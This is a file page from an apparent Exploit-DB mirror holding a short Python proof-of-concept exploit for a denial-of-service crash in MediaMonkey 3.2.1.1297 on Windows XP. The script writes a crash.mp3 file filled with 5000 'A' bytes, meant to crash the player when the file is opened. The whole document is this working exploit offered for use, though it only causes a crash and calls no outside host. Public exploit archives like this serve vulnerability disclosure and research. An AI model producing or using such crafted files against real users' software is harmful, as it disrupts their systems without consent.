exploit-db-mirror/platforms/windows/dos/14555.py
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

14 lines
No EOL
268 B
Python
Executable file

#Mediamonkey v. 3.2.1.1297 DOS POC
#vulnerble application link http://www.mediamonkey.com/trialpay
#tested on XP SP2/3
#!/usr/bin/python
filename = "crash.mp3"
junk = "\x41" * 5000
textfile = open(filename , 'w')
textfile.write(junk)
textfile.close()